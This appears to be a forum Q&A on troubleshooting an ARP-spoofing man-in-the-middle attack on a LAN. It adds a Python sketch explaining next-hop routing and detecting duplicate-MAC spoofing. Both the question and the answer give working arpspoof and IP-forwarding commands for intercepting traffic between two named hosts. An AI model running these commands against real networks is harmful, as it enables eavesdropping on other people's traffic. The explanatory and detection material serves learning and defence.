
I am attempting to perform a MITM attack via ARP spoofing to sniff out the traffic from 10.0.0.54 to 10.0.0.55. Here is my setup:

# Enable forwarding so the victim keeps connectivity; the redirect needs root,
# so it is wrapped in sh -c when run from a non-root shell.
sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
# Tell 10.0.0.54 that 10.0.0.1 is at this host's MAC, and vice versa.
sudo arpspoof -i wlan0 -t 10.0.0.54 10.0.0.1
sudo arpspoof -i wlan0 -t 10.0.0.1 10.0.0.54

My knowledge is that this captures all traffic from 10.0.0.54. However, based on my analysis of tcpdump, I am only capturing external traffic (any public IP addresses) and not capturing any internal traffic (private IP addresses).

Can someone tell me why this would be the case? Should I send my ARP requests elsewhere?

Gavin Youker
  • Since you want to sniff data between .54 and .55, why are you spoofing 10.0.0.1 instead of 10.0.0.55? – Eibo Jul 24 '17 at 06:28
  • You can capture external traffic without ARP poisoning. I can't understand the logic; why are you spoofing 10.0.0.1? – Kerim Can Kalıpcıoğlu Jul 24 '17 at 07:16
  • @Emadeddin My thought was that sniffing the router (10.0.0.1) would allow me to receive all traffic from 10.0.0.54 on the network, including 10.0.0.55. Are you saying my setup should look something like `sudo arpspoof -i wlan0 -t 10.0.0.54 10.0.0.55`? – Gavin Youker Jul 25 '17 at 03:24

1 Answer

Since you want to capture data between two devices that exist on the same network range (i.e. 10.0.0.0), you don't need to spoof the router.

Your MITM attack should take place between the two devices, because when you're on the same network the data flows directly from one device to the other and doesn't go to the router (of course there are a few exceptions).

So, you need to modify your commands to the following:

# Forwarding still has to be on so the two hosts keep talking to each other
# (the redirect needs root, hence sh -c).
sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
# Poison each peer's ARP entry for the other, instead of the gateway's.
sudo arpspoof -i wlan0 -t 10.0.0.54 10.0.0.55
sudo arpspoof -i wlan0 -t 10.0.0.55 10.0.0.54

If you have further issues, please update your question.

Eibo
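To make the answer's reasoning concrete, here is an added example (not code from the question or the answer) that models the next-hop decision a host on 10.0.0.0/24 makes, shows which destinations a poisoned ARP entry actually redirects, and adds the check a defender would run over observed ARP replies. The /24 mask, the MAC addresses and the ARP-table snapshots are constructed assumptions.

```python
"""Why poisoning only the gateway misses same-subnet traffic, and the ARP
footprint a defender looks for. All addresses and MACs below are constructed."""
import ipaddress
from collections import defaultdict

NETWORK = ipaddress.ip_network("10.0.0.0/24")   # assumed mask for the question's 10.0.0.x hosts
GATEWAY = "10.0.0.1"


def next_hop(dst_ip: str) -> str:
    """IP a host on NETWORK resolves via ARP before sending to dst_ip:
    on-subnet destinations are ARPed directly, everything else goes via the gateway."""
    return dst_ip if ipaddress.ip_address(dst_ip) in NETWORK else GATEWAY


def passes_through(attacker_mac: str, arp_table: dict, dst_ip: str) -> bool:
    """True if the sender's ARP table maps the next hop for dst_ip to the
    attacker's MAC, i.e. the frame is delivered to the MITM host."""
    return arp_table.get(next_hop(dst_ip)) == attacker_mac


def duplicate_mac_ips(arp_observations: dict) -> dict:
    """Defender's check over IP->MAC bindings seen in ARP replies on the wire:
    a MAC claiming several IPs (gateway plus a host) is the classic spoofing symptom."""
    by_mac = defaultdict(list)
    for ip, mac in arp_observations.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips, key=ipaddress.ip_address)
            for mac, ips in by_mac.items() if len(ips) > 1}


ATTACKER = "aa:bb:cc:dd:ee:ff"          # constructed MAC of the sniffing host
# 10.0.0.54's ARP table after the question's original commands: only the gateway entry is rewritten.
TABLE_GATEWAY_ONLY = {"10.0.0.1": ATTACKER, "10.0.0.55": "00:11:22:33:44:55"}
# The same table after the answer's corrected commands target .55 instead of .1.
TABLE_PEER = {"10.0.0.1": "00:11:22:33:44:01", "10.0.0.55": ATTACKER}
# Bindings a monitoring host would collect from ARP replies during the original setup
# (10.0.0.9 is the constructed real address of the sniffing host).
MONITOR_SEEN = {"10.0.0.1": ATTACKER, "10.0.0.54": ATTACKER,
                "10.0.0.9": ATTACKER, "10.0.0.55": "00:11:22:33:44:55"}

if __name__ == "__main__":
    for dst in ("8.8.8.8", "10.0.0.55"):
        print(f"{dst}: next hop {next_hop(dst)}, "
              f"intercepted with gateway poisoning: {passes_through(ATTACKER, TABLE_GATEWAY_ONLY, dst)}, "
              f"with peer poisoning: {passes_through(ATTACKER, TABLE_PEER, dst)}")
    print("MACs claiming several IPs:", duplicate_mac_ips(MONITOR_SEEN))
```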